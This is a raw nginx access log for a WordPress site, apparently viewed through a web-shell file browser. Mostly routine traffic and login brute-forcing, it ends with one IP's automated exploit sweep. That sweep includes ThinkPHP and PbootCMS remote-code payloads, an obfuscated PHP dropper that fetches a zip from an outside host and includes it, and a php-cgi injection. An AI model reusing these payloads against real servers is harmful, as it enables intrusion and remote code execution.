HEX
Server: nginx/1.16.1
System: Linux ecs-04358622 4.19.90-2107.6.0.0100.oe1.bclinux.x86_64 #1 SMP Wed Dec 1 19:59:44 CST 2021 x86_64
User: nginx (994)
PHP: 8.0.0
Disabled: NONE
Upload Files
File: //home/logs/cqqizhou_access_2025-09-11.log
36.133.115.36 - - [11/Sep/2025:00:03:56 +0800] "POST /wp-cron.php?doing_wp_cron=1757520236.6216909885406494140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [11/Sep/2025:00:03:56 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
36.133.115.36 - - [11/Sep/2025:00:05:23 +0800] "POST /wp-cron.php?doing_wp_cron=1757520323.0247910022735595703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.74.123.7 - - [11/Sep/2025:00:05:23 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62"
103.74.123.7 - - [11/Sep/2025:00:05:24 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36"
36.133.115.36 - - [11/Sep/2025:00:06:39 +0800] "POST /wp-cron.php?doing_wp_cron=1757520399.3165190219879150390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.153.135.208 - - [11/Sep/2025:00:06:39 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.135.208 - - [11/Sep/2025:00:06:41 +0800] "GET / HTTP/1.1" 200 33467 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [11/Sep/2025:00:06:49 +0800] "POST /wp-cron.php?doing_wp_cron=1757520409.1121649742126464843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [11/Sep/2025:00:07:20 +0800] "GET / HTTP/1.1" 200 96805 "-" "-"
36.133.115.36 - - [11/Sep/2025:00:09:39 +0800] "POST /wp-cron.php?doing_wp_cron=1757520579.1647949218750000000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [11/Sep/2025:00:09:39 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [11/Sep/2025:00:09:51 +0800] "POST /wp-cron.php?doing_wp_cron=1757520591.6431279182434082031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
51.255.71.164 - - [11/Sep/2025:00:09:51 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0"
51.255.71.164 - - [11/Sep/2025:00:09:52 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0"
37.60.141.158 - - [11/Sep/2025:00:10:08 +0800] "POST /boaform/admin/formLogin HTTP/1.1" 404 8989 "http://36.133.115.36:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
36.133.115.36 - - [11/Sep/2025:00:12:31 +0800] "POST /wp-cron.php?doing_wp_cron=1757520751.3685479164123535156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
123.187.240.242 - - [11/Sep/2025:00:12:31 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
123.187.240.242 - - [11/Sep/2025:00:12:32 +0800] "GET / HTTP/1.1" 200 33466 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
81.177.135.2 - - [11/Sep/2025:00:14:46 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0"
81.177.135.2 - - [11/Sep/2025:00:14:48 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67"
36.133.115.36 - - [11/Sep/2025:00:17:45 +0800] "POST /wp-cron.php?doing_wp_cron=1757521065.9105958938598632812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
82.147.84.145 - - [11/Sep/2025:00:17:46 +0800] "POST /boaform/admin/formLogin HTTP/1.1" 404 8989 "http://36.133.115.36:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
36.133.115.36 - - [11/Sep/2025:00:21:15 +0800] "POST /wp-cron.php?doing_wp_cron=1757521275.2023921012878417968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
170.106.147.63 - - [11/Sep/2025:00:21:15 +0800] "GET /wp-json/ HTTP/1.1" 200 19172 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [11/Sep/2025:00:30:16 +0800] "POST /wp-cron.php?doing_wp_cron=1757521816.1192710399627685546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
49.51.243.95 - - [11/Sep/2025:00:30:16 +0800] "GET /comments/feed/ HTTP/1.1" 200 704 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [11/Sep/2025:00:33:05 +0800] "POST /wp-cron.php?doing_wp_cron=1757521985.5763070583343505859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
92.53.106.114 - - [11/Sep/2025:00:33:05 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36"
92.53.106.114 - - [11/Sep/2025:00:33:06 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0"
17.241.75.44 - - [11/Sep/2025:00:35:32 +0800] "GET /2160/ HTTP/1.1" 200 29934 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
36.133.115.36 - - [11/Sep/2025:00:37:45 +0800] "POST /wp-cron.php?doing_wp_cron=1757522265.2199580669403076171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.22.218.230 - - [11/Sep/2025:00:37:45 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0"
165.22.218.230 - - [11/Sep/2025:00:37:46 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36"
43.130.14.245 - - [11/Sep/2025:00:41:42 +0800] "GET /wp-content/plugins/ HTTP/1.1" 200 31 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [11/Sep/2025:00:42:22 +0800] "POST /wp-cron.php?doing_wp_cron=1757522542.8206150531768798828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
185.25.117.32 - - [11/Sep/2025:00:42:22 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62"
185.25.117.32 - - [11/Sep/2025:00:42:25 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0"
45.89.70.30 - - [11/Sep/2025:00:46:10 +0800] "GET / HTTP/1.0" 200 165852 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
45.89.70.30 - - [11/Sep/2025:00:46:11 +0800] "GET /contacts/ HTTP/1.0" 200 76104 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
36.133.115.36 - - [11/Sep/2025:00:46:13 +0800] "POST /wp-cron.php?doing_wp_cron=1757522773.2290389537811279296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.89.70.30 - - [11/Sep/2025:00:46:14 +0800] "POST /contacts/ HTTP/1.0" 200 68836 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
36.133.115.36 - - [11/Sep/2025:00:46:50 +0800] "POST /wp-cron.php?doing_wp_cron=1757522810.1101939678192138671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
77.83.106.131 - - [11/Sep/2025:00:46:50 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36"
77.83.106.131 - - [11/Sep/2025:00:46:51 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0"
36.133.115.36 - - [11/Sep/2025:00:47:58 +0800] "POST /wp-cron.php?doing_wp_cron=1757522878.3493649959564208984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [11/Sep/2025:00:47:58 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
159.198.79.246 - - [11/Sep/2025:00:48:31 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
159.198.79.246 - - [11/Sep/2025:00:48:33 +0800] "POST /wp-login.php HTTP/1.1" 200 2971 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
17.241.75.191 - - [11/Sep/2025:00:48:47 +0800] "GET /business/ HTTP/1.1" 200 22444 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
36.133.115.36 - - [11/Sep/2025:00:51:04 +0800] "POST /wp-cron.php?doing_wp_cron=1757523064.0780019760131835937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
170.106.165.186 - - [11/Sep/2025:00:51:04 +0800] "GET /feed/ HTTP/1.1" 200 82044 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
103.28.36.105 - - [11/Sep/2025:00:51:19 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203"
103.28.36.105 - - [11/Sep/2025:00:51:20 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0"
36.133.115.36 - - [11/Sep/2025:00:55:44 +0800] "POST /wp-cron.php?doing_wp_cron=1757523344.2271978855133056640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
162.19.11.246 - - [11/Sep/2025:00:55:44 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36"
162.19.11.246 - - [11/Sep/2025:00:55:45 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1"
43.133.14.237 - - [11/Sep/2025:01:00:38 +0800] "GET /wp-content/plugins/revslider/ HTTP/1.1" 200 31 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [11/Sep/2025:01:01:56 +0800] "POST /wp-cron.php?doing_wp_cron=1757523715.9694209098815917968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.156.168.214 - - [11/Sep/2025:01:01:56 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [11/Sep/2025:01:11:58 +0800] "POST /wp-cron.php?doing_wp_cron=1757524318.4953091144561767578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.166.255.102 - - [11/Sep/2025:01:11:58 +0800] "GET /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [11/Sep/2025:01:13:23 +0800] "POST /wp-cron.php?doing_wp_cron=1757524403.4134728908538818359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
57.128.47.115 - - [11/Sep/2025:01:13:23 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0"
57.128.47.115 - - [11/Sep/2025:01:13:24 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50"
149.50.103.48 - - [11/Sep/2025:01:13:28 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [11/Sep/2025:01:18:03 +0800] "POST /wp-cron.php?doing_wp_cron=1757524683.3130080699920654296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
161.97.70.99 - - [11/Sep/2025:01:18:03 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68"
161.97.70.99 - - [11/Sep/2025:01:18:04 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0"
36.133.115.36 - - [11/Sep/2025:01:20:23 +0800] "POST /wp-cron.php?doing_wp_cron=1757524823.2614688873291015625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.130.102.223 - - [11/Sep/2025:01:20:23 +0800] "GET /2164/ HTTP/1.1" 200 19593 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [11/Sep/2025:01:27:20 +0800] "POST /wp-cron.php?doing_wp_cron=1757525240.1827459335327148437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
89.45.83.89 - - [11/Sep/2025:01:27:20 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
89.45.83.89 - - [11/Sep/2025:01:27:21 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68"
36.133.115.36 - - [11/Sep/2025:01:28:40 +0800] "POST /wp-cron.php?doing_wp_cron=1757525320.7746720314025878906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
186.123.150.120 - - [11/Sep/2025:01:28:41 +0800] "GET / HTTP/1.1" 200 151919 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
43.155.195.141 - - [11/Sep/2025:01:31:34 +0800] "GET /wp-content/uploads/2025/07/1753455650-DSC01469-300x169.webp HTTP/1.1" 200 8050 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [11/Sep/2025:01:36:36 +0800] "POST /wp-cron.php?doing_wp_cron=1757525796.3682940006256103515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
34.168.79.94 - - [11/Sep/2025:01:36:36 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0"
34.168.79.94 - - [11/Sep/2025:01:36:37 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36"
36.133.115.36 - - [11/Sep/2025:01:37:09 +0800] "POST /wp-cron.php?doing_wp_cron=1757525829.4459640979766845703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.153.27.244 - - [11/Sep/2025:01:37:09 +0800] "GET /?p=2159 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.27.244 - - [11/Sep/2025:01:37:15 +0800] "GET /2159/ HTTP/1.1" 200 24775 "http://cqqizhou.com/?p=2159" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [11/Sep/2025:01:41:15 +0800] "POST /wp-cron.php?doing_wp_cron=1757526075.5059258937835693359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
172.210.68.47 - - [11/Sep/2025:01:41:15 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
172.210.68.47 - - [11/Sep/2025:01:41:16 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
36.133.115.36 - - [11/Sep/2025:01:41:46 +0800] "POST /wp-cron.php?doing_wp_cron=1757526106.3547260761260986328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.204.213.103 - - [11/Sep/2025:01:41:46 +0800] "POST /FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F HTTP/1.1" 404 31381 "http://www.cqqizhou.com/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
45.204.213.103 - - [11/Sep/2025:01:41:47 +0800] "POST /?tag/index=&tag=%7Bpbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)%7D(123)%7B/pbhome/Indexoot:if%7D&tagstpl=news.html&lnoc2tspfar1_ue HTTP/1.1" 404 31381 "http://www.cqqizhou.com/?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; de-de) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16"
45.204.213.103 - - [11/Sep/2025:01:41:47 +0800] "GET /ssbe.php HTTP/1.1" 404 27 "http://www.cqqizhou.com/ssbe.php" "Mozilla/4.0 (compatible; MSIE 6.0; Mac_PowerPC; en) Opera 9.24"
45.204.213.103 - - [11/Sep/2025:01:41:48 +0800] "POST /index.php?s=captcha HTTP/1.1" 200 65005 "http://www.cqqizhou.com/index.php?s=captcha" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; Zune 4.7; InfoPath.3)"
45.204.213.103 - - [11/Sep/2025:01:41:51 +0800] "POST /index.php?s=captcha HTTP/1.1" 200 65005 "http://www.cqqizhou.com/index.php?s=captcha" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
45.204.213.103 - - [11/Sep/2025:01:41:53 +0800] "GET /bdc.php HTTP/1.1" 404 27 "http://www.cqqizhou.com/bdc.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198 Safari/532.0"
45.204.213.103 - - [11/Sep/2025:01:41:54 +0800] "POST /index.php?s=captcha HTTP/1.1" 200 65005 "http://www.cqqizhou.com/index.php?s=captcha" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"
45.204.213.103 - - [11/Sep/2025:01:41:56 +0800] "GET /akqf.php HTTP/1.1" 404 27 "http://www.cqqizhou.com/akqf.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_4) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30"
45.204.213.103 - - [11/Sep/2025:01:41:57 +0800] "POST /index.php?s=captcha HTTP/1.1" 400 2528 "http://www.cqqizhou.com/index.php?s=captcha" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.4 Safari/532.2"
45.204.213.103 - - [11/Sep/2025:01:41:57 +0800] "GET /ymdx.php HTTP/1.1" 404 27 "http://www.cqqizhou.com/ymdx.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; Zune 4.7)"
45.204.213.103 - - [11/Sep/2025:01:41:58 +0800] "GET /?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=cbjut.php&vars%5B1%5D%5B%5D=%3C?php%20$O00OO0=urldecode(%22%78%34%63%6F%2F%70%39%79%71%6E%64%2D%6C%72%6B%64%67%5F%65%68%63%73%77%6F%2B%66%33%37%6A%66%69%6C%65%66%64%66%64%73%70%75%74%64%66%64%63%6F%6E%64%73%74%65%6E%6D%71%76%75%22);$O00O0O=$O00OO0%5B44%5D.$O00OO0%5B23%5D.$O00OO0%5B38%5D.$O00OO0%5B7%5D;$O00OO1=urldecode(%22http%3A%2F%2Fmindpine.net%2Fcss%2F404.zip%22);$O00OO2=%224%22.%220%22.%224%22.%22.zip%22;$O00O0O($O00OO1,$O00OO2);include%20$O00OO2;?%3E$ HTTP/1.1" 200 65160 "http://www.cqqizhou.com/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=cbjut.php&vars[1][]=<?php $O00OO0=urldecode(\x22%78%34%63%6F%2F%70%39%79%71%6E%64%2D%6C%72%6B%64%67%5F%65%68%63%73%77%6F%2B%66%33%37%6A%66%69%6C%65%66%64%66%64%73%70%75%74%64%66%64%63%6F%6E%64%73%74%65%6E%6D%71%76%75\x22);$O00O0O=$O00OO0[44].$O00OO0[23].$O00OO0[38].$O00OO0[7];$O00OO1=urldecode(\x22http%3A%2F%2Fmindpine.net%2Fcss%2F404.zip\x22);$O00OO2=\x224\x22.\x220\x22.\x224\x22.\x22.zip\x22;$O00O0O($O00OO1,$O00OO2);include $O00OO2;?>$" "Mozilla/5.0 (Windows; U; Windows NT 5.1 ; x64; en-US; rv:1.9.1b2pre) Gecko/20081026 Firefox/3.1b2pre"
45.204.213.103 - - [11/Sep/2025:01:42:00 +0800] "GET /cbjut.php HTTP/1.1" 404 27 "http://www.cqqizhou.com/cbjut.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.25 (KHTML, like Gecko) Chrome/12.0.706.0 Safari/534.25"
45.204.213.103 - - [11/Sep/2025:01:42:01 +0800] "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1" 404 31381 "http://www.cqqizhou.com/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
